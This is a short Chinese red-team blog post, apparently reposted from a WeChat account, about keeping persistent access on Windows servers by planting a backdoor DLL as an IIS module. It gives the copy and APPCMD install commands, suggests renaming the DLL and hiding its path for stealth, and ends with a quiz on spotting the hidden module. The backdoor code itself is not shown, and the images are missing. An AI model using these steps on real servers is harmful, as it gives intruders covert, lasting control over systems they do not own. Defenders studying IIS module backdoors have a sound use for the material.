【红蓝攻防】红队中的内网权限维持(2)

  • A+
所属分类:安全文章

IIS - Module后门

把后门dll放到  C:WindowsSystem32inetsrv,增加隐蔽性(可以自己改名)

copy IIS-Backdoor.dll %windir%System32inetsrvIIS-Backdoor.dll

安装后门

C:Windowssystem32inetsrvAPPCMD.EXE install module /name:0-sec /image:"%windir%System32inetsrvIIS-Backdoor.dll" /add:true

删除后门

C:Windowssystem32inetsrvAPPCMD.EXE uninstall module 0-sec

查看已安装模块

C:Windowssystem32inetsrvAPPCMD.EXE list module


运行inetmgr.exe,进入IIS管理器,选择Modules

【红蓝攻防】红队中的内网权限维持(2)

【红蓝攻防】红队中的内网权限维持(2)

【红蓝攻防】红队中的内网权限维持(2)


再通过主控端进行命令执行操作


【红蓝攻防】红队中的内网权限维持(2)【红蓝攻防】红队中的内网权限维持(2)

流量分析


【红蓝攻防】红队中的内网权限维持(2)

【红蓝攻防】红队中的内网权限维持(2)


再次访问模块,发现刚刚新建的模块直接显示的就是绝对路径泄漏的太明显了。我们重新编辑修改一下

【红蓝攻防】红队中的内网权限维持(2)

【红蓝攻防】红队中的内网权限维持(2)


最后再来个有奖竞答,底下截图的模块里,哪一个才是后门?


第一个留言回答正确的奖励文库邀请码一枚,如果有账号则加20信誉值积分。


【红蓝攻防】红队中的内网权限维持(2)


本文始发于微信公众号(零组攻防实验室):【红蓝攻防】红队中的内网权限维持(2)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: